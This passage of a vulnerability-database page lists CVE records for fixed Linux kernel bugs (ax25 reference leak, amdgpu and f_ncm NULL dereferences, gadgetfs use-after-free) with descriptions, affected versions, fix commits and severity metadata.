"cveId": "CVE-2023-52909",
"datePublished": "2024-08-21T06:10:50.303Z",
"dateReserved": "2024-08-21T06:07:11.015Z",
"dateUpdated": "2025-05-04T07:45:49.273Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38602 (GCVE-0-2024-38602)
Vulnerability from cvelistv5
Published
2024-06-19 13:48
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ax25: Fix reference count leak issues of ax25_dev
The ax25_addr_ax25dev() and ax25_dev_device_down() exist a reference
count leak issue of the object "ax25_dev".
Memory leak issue in ax25_addr_ax25dev():
The reference count of the object "ax25_dev" can be increased multiple
times in ax25_addr_ax25dev(). This will cause a memory leak.
Memory leak issues in ax25_dev_device_down():
The reference count of ax25_dev is set to 1 in ax25_dev_device_up() and
then increase the reference count when ax25_dev is added to ax25_dev_list.
As a result, the reference count of ax25_dev is 2. But when the device is
shutting down. The ax25_dev_device_down() drops the reference count once
or twice depending on if we goto unlock_put or not, which will cause
memory leak.
As for the issue of ax25_addr_ax25dev(), it is impossible for one pointer
to be on a list twice. So add a break in ax25_addr_ax25dev(). As for the
issue of ax25_dev_device_down(), increase the reference count of ax25_dev
once in ax25_dev_device_up() and decrease the reference count of ax25_dev
after it is removed from the ax25_dev_list.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d01ffb9eee4af165d83b08dd73ebdf9fe94a519b Version: d01ffb9eee4af165d83b08dd73ebdf9fe94a519b Version: d01ffb9eee4af165d83b08dd73ebdf9fe94a519b Version: d01ffb9eee4af165d83b08dd73ebdf9fe94a519b Version: d01ffb9eee4af165d83b08dd73ebdf9fe94a519b Version: ef0a2a0565727a48f2e36a2c461f8b1e3a61922d Version: e2b558fe507a1ed4c43db2b0057fc6e41f20a14c Version: 418993bbaafb0cd48f904ba68eeda052d624c821 Version: 5ea00fc60676c0eebfa8560ec461209d638bca9d Version: 9af0fd5c4453a44c692be0cbb3724859b75d739b |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:12:26.063Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae467750a3765dd1092eb29f58247950a2f9b60c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/38eb01edfdaa1562fa00429be2e33f45383b1b3a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/81d8240b0a243b3ddd8fa8aa172f1acc2f7cc8f3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1ea02699c7557eeb35ccff2bd822de1b3e09d868"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b505e0319852b08a3a716b64620168eab21f4ced"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38602",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:13:18.286377Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:53.956Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ax25/ax25_dev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ae467750a3765dd1092eb29f58247950a2f9b60c",
"status": "affected",
"version": "d01ffb9eee4af165d83b08dd73ebdf9fe94a519b",
"versionType": "git"
},
{
"lessThan": "38eb01edfdaa1562fa00429be2e33f45383b1b3a",
"status": "affected",
"version": "d01ffb9eee4af165d83b08dd73ebdf9fe94a519b",
"versionType": "git"
},
{
"lessThan": "81d8240b0a243b3ddd8fa8aa172f1acc2f7cc8f3",
"status": "affected",
"version": "d01ffb9eee4af165d83b08dd73ebdf9fe94a519b",
"versionType": "git"
},
{
"lessThan": "1ea02699c7557eeb35ccff2bd822de1b3e09d868",
"status": "affected",
"version": "d01ffb9eee4af165d83b08dd73ebdf9fe94a519b",
"versionType": "git"
},
{
"lessThan": "b505e0319852b08a3a716b64620168eab21f4ced",
"status": "affected",
"version": "d01ffb9eee4af165d83b08dd73ebdf9fe94a519b",
"versionType": "git"
},
{
"status": "affected",
"version": "ef0a2a0565727a48f2e36a2c461f8b1e3a61922d",
"versionType": "git"
},
{
"status": "affected",
"version": "e2b558fe507a1ed4c43db2b0057fc6e41f20a14c",
"versionType": "git"
},
{
"status": "affected",
"version": "418993bbaafb0cd48f904ba68eeda052d624c821",
"versionType": "git"
},
{
"status": "affected",
"version": "5ea00fc60676c0eebfa8560ec461209d638bca9d",
"versionType": "git"
},
{
"status": "affected",
"version": "9af0fd5c4453a44c692be0cbb3724859b75d739b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ax25/ax25_dev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.17"
},
{
"lessThan": "5.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.277",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.240",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.190",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.10.112",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.15.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nax25: Fix reference count leak issues of ax25_dev\n\nThe ax25_addr_ax25dev() and ax25_dev_device_down() exist a reference\ncount leak issue of the object \"ax25_dev\".\n\nMemory leak issue in ax25_addr_ax25dev():\n\nThe reference count of the object \"ax25_dev\" can be increased multiple\ntimes in ax25_addr_ax25dev(). This will cause a memory leak.\n\nMemory leak issues in ax25_dev_device_down():\n\nThe reference count of ax25_dev is set to 1 in ax25_dev_device_up() and\nthen increase the reference count when ax25_dev is added to ax25_dev_list.\nAs a result, the reference count of ax25_dev is 2. But when the device is\nshutting down. The ax25_dev_device_down() drops the reference count once\nor twice depending on if we goto unlock_put or not, which will cause\nmemory leak.\n\nAs for the issue of ax25_addr_ax25dev(), it is impossible for one pointer\nto be on a list twice. So add a break in ax25_addr_ax25dev(). As for the\nissue of ax25_dev_device_down(), increase the reference count of ax25_dev\nonce in ax25_dev_device_up() and decrease the reference count of ax25_dev\nafter it is removed from the ax25_dev_list."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:51.840Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ae467750a3765dd1092eb29f58247950a2f9b60c"
},
{
"url": "https://git.kernel.org/stable/c/38eb01edfdaa1562fa00429be2e33f45383b1b3a"
},
{
"url": "https://git.kernel.org/stable/c/81d8240b0a243b3ddd8fa8aa172f1acc2f7cc8f3"
},
{
"url": "https://git.kernel.org/stable/c/1ea02699c7557eeb35ccff2bd822de1b3e09d868"
},
{
"url": "https://git.kernel.org/stable/c/b505e0319852b08a3a716b64620168eab21f4ced"
}
],
"title": "ax25: Fix reference count leak issues of ax25_dev",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38602",
"datePublished": "2024-06-19T13:48:13.768Z",
"dateReserved": "2024-06-18T19:36:34.933Z",
"dateUpdated": "2025-05-04T12:56:51.840Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41093 (GCVE-0-2024-41093)
Vulnerability from cvelistv5
Published
2024-07-29 15:48
Modified
2025-09-16 08:02
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: avoid using null object of framebuffer
Instead of using state->fb->obj[0] directly, get object from framebuffer
by calling drm_gem_fb_get_obj() and return error code when object is
null to avoid using null object of framebuffer.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:52.289Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7f35e01cb0ea4d295f5c067bb5c67dfcddaf05bc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6ce0544cabaa608018d5922ab404dc656a9d8447"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/330c8c1453848c04d335bad81371a66710210800"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dd9ec0ea4cdde0fc48116e63969fc83e81d7ef46"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bcfa48ff785bd121316592b131ff6531e3e696bb"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41093",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:20:32.237829Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:55.898Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7f35e01cb0ea4d295f5c067bb5c67dfcddaf05bc",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "6ce0544cabaa608018d5922ab404dc656a9d8447",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "330c8c1453848c04d335bad81371a66710210800",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "dd9ec0ea4cdde0fc48116e63969fc83e81d7ef46",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "bcfa48ff785bd121316592b131ff6531e3e696bb",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.2"
},
{
"lessThan": "4.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: avoid using null object of framebuffer\n\nInstead of using state-\u003efb-\u003eobj[0] directly, get object from framebuffer\nby calling drm_gem_fb_get_obj() and return error code when object is\nnull to avoid using null object of framebuffer."
}
],
"providerMetadata": {
"dateUpdated": "2025-09-16T08:02:40.601Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7f35e01cb0ea4d295f5c067bb5c67dfcddaf05bc"
},
{
"url": "https://git.kernel.org/stable/c/6ce0544cabaa608018d5922ab404dc656a9d8447"
},
{
"url": "https://git.kernel.org/stable/c/330c8c1453848c04d335bad81371a66710210800"
},
{
"url": "https://git.kernel.org/stable/c/dd9ec0ea4cdde0fc48116e63969fc83e81d7ef46"
},
{
"url": "https://git.kernel.org/stable/c/bcfa48ff785bd121316592b131ff6531e3e696bb"
}
],
"title": "drm/amdgpu: avoid using null object of framebuffer",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41093",
"datePublished": "2024-07-29T15:48:06.686Z",
"dateReserved": "2024-07-12T12:17:45.636Z",
"dateUpdated": "2025-09-16T08:02:40.601Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52894 (GCVE-0-2023-52894)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: f_ncm: fix potential NULL ptr deref in ncm_bitrate()
In Google internal bug 265639009 we've received an (as yet) unreproducible
crash report from an aarch64 GKI 5.10.149-android13 running device.
AFAICT the source code is at:
https://android.googlesource.com/kernel/common/+/refs/tags/ASB-2022-12-05_13-5.10
The call stack is:
ncm_close() -> ncm_notify() -> ncm_do_notify()
with the crash at:
ncm_do_notify+0x98/0x270
Code: 79000d0b b9000a6c f940012a f9400269 (b9405d4b)
Which I believe disassembles to (I don't know ARM assembly, but it looks sane enough to me...):
// halfword (16-bit) store presumably to event->wLength (at offset 6 of struct usb_cdc_notification)
0B 0D 00 79 strh w11, [x8, #6]
// word (32-bit) store presumably to req->Length (at offset 8 of struct usb_request)
6C 0A 00 B9 str w12, [x19, #8]
// x10 (NULL) was read here from offset 0 of valid pointer x9
// IMHO we're reading 'cdev->gadget' and getting NULL
// gadget is indeed at offset 0 of struct usb_composite_dev
2A 01 40 F9 ldr x10, [x9]
// loading req->buf pointer, which is at offset 0 of struct usb_request
69 02 40 F9 ldr x9, [x19]
// x10 is null, crash, appears to be attempt to read cdev->gadget->max_speed
4B 5D 40 B9 ldr w11, [x10, #0x5c]
which seems to line up with ncm_do_notify() case NCM_NOTIFY_SPEED code fragment:
event->wLength = cpu_to_le16(8);
req->length = NCM_STATUS_BYTECOUNT;
/* SPEED_CHANGE data is up/down speeds in bits/sec */
data = req->buf + sizeof *event;
data[0] = cpu_to_le32(ncm_bitrate(cdev->gadget));
My analysis of registers and NULL ptr deref crash offset
(Unable to handle kernel NULL pointer dereference at virtual address 000000000000005c)
heavily suggests that the crash is due to 'cdev->gadget' being NULL when executing:
data[0] = cpu_to_le32(ncm_bitrate(cdev->gadget));
which calls:
ncm_bitrate(NULL)
which then calls:
gadget_is_superspeed(NULL)
which reads
((struct usb_gadget *)NULL)->max_speed
and hits a panic.
AFAICT, if I'm counting right, the offset of max_speed is indeed 0x5C.
(remember there's a GKI KABI reservation of 16 bytes in struct work_struct)
It's not at all clear to me how this is all supposed to work...
but returning 0 seems much better than panic-ing...
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52894",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:50.056364Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:13.931Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/function/f_ncm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fef6b29671b66dfb71f17e337c1ad14b5a2cedae",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "63d161f29cd39c050e8873aa36e0c9fc013bb763",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a21da7f7aae618c785f7e4a275d43c06dc8412b6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e92c70059178da751e5af7de02384b7dfadb5ec7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a69c8dfb85b44be9cc223be07d35cc3a9baefbea",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "09e4507ec8ef2d44da6ba4092b8ee2d81f216497",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c6ec929595c7443250b2a4faea988c62019d5cd2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/function/f_ncm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.304",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.230",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.304",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.271",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.230",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.165",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_ncm: fix potential NULL ptr deref in ncm_bitrate()\n\nIn Google internal bug 265639009 we\u0027ve received an (as yet) unreproducible\ncrash report from an aarch64 GKI 5.10.149-android13 running device.\n\nAFAICT the source code is at:\n https://android.googlesource.com/kernel/common/+/refs/tags/ASB-2022-12-05_13-5.10\n\nThe call stack is:\n ncm_close() -\u003e ncm_notify() -\u003e ncm_do_notify()\nwith the crash at:\n ncm_do_notify+0x98/0x270\nCode: 79000d0b b9000a6c f940012a f9400269 (b9405d4b)\n\nWhich I believe disassembles to (I don\u0027t know ARM assembly, but it looks sane enough to me...):\n\n // halfword (16-bit) store presumably to event-\u003ewLength (at offset 6 of struct usb_cdc_notification)\n 0B 0D 00 79 strh w11, [x8, #6]\n\n // word (32-bit) store presumably to req-\u003eLength (at offset 8 of struct usb_request)\n 6C 0A 00 B9 str w12, [x19, #8]\n\n // x10 (NULL) was read here from offset 0 of valid pointer x9\n // IMHO we\u0027re reading \u0027cdev-\u003egadget\u0027 and getting NULL\n // gadget is indeed at offset 0 of struct usb_composite_dev\n 2A 01 40 F9 ldr x10, [x9]\n\n // loading req-\u003ebuf pointer, which is at offset 0 of struct usb_request\n 69 02 40 F9 ldr x9, [x19]\n\n // x10 is null, crash, appears to be attempt to read cdev-\u003egadget-\u003emax_speed\n 4B 5D 40 B9 ldr w11, [x10, #0x5c]\n\nwhich seems to line up with ncm_do_notify() case NCM_NOTIFY_SPEED code fragment:\n\n event-\u003ewLength = cpu_to_le16(8);\n req-\u003elength = NCM_STATUS_BYTECOUNT;\n\n /* SPEED_CHANGE data is up/down speeds in bits/sec */\n data = req-\u003ebuf + sizeof *event;\n data[0] = cpu_to_le32(ncm_bitrate(cdev-\u003egadget));\n\nMy analysis of registers and NULL ptr deref crash offset\n (Unable to handle kernel NULL pointer dereference at virtual address 000000000000005c)\nheavily suggests that the crash is due to \u0027cdev-\u003egadget\u0027 being NULL when executing:\n data[0] = cpu_to_le32(ncm_bitrate(cdev-\u003egadget));\nwhich calls:\n ncm_bitrate(NULL)\nwhich then calls:\n gadget_is_superspeed(NULL)\nwhich reads\n ((struct usb_gadget *)NULL)-\u003emax_speed\nand hits a panic.\n\nAFAICT, if I\u0027m counting right, the offset of max_speed is indeed 0x5C.\n(remember there\u0027s a GKI KABI reservation of 16 bytes in struct work_struct)\n\nIt\u0027s not at all clear to me how this is all supposed to work...\nbut returning 0 seems much better than panic-ing..."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:27.188Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fef6b29671b66dfb71f17e337c1ad14b5a2cedae"
},
{
"url": "https://git.kernel.org/stable/c/63d161f29cd39c050e8873aa36e0c9fc013bb763"
},
{
"url": "https://git.kernel.org/stable/c/a21da7f7aae618c785f7e4a275d43c06dc8412b6"
},
{
"url": "https://git.kernel.org/stable/c/e92c70059178da751e5af7de02384b7dfadb5ec7"
},
{
"url": "https://git.kernel.org/stable/c/a69c8dfb85b44be9cc223be07d35cc3a9baefbea"
},
{
"url": "https://git.kernel.org/stable/c/09e4507ec8ef2d44da6ba4092b8ee2d81f216497"
},
{
"url": "https://git.kernel.org/stable/c/c6ec929595c7443250b2a4faea988c62019d5cd2"
}
],
"title": "usb: gadget: f_ncm: fix potential NULL ptr deref in ncm_bitrate()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52894",
"datePublished": "2024-08-21T06:10:34.120Z",
"dateReserved": "2024-08-21T06:07:11.013Z",
"dateUpdated": "2025-05-04T07:45:27.188Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-4382 (GCVE-0-2022-4382)
Vulnerability from cvelistv5
Published
2023-01-10 00:00
Modified
2025-04-09 15:34
Severity ?
VLAI Severity ?
EPSS score ?
CWE
Summary
A use-after-free flaw caused by a race among the superblock operations in the gadgetfs Linux driver was found. It could be triggered by yanking out a device that is running the gadgetfs side.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| n/a | Linux kernel |
Version: unknown |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T01:41:44.608Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.openwall.com/lists/oss-security/2022/12/14/5"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "PHYSICAL",
"availabilityImpact": "HIGH",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-4382",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-09T15:33:38.767237Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-09T15:34:11.631Z",
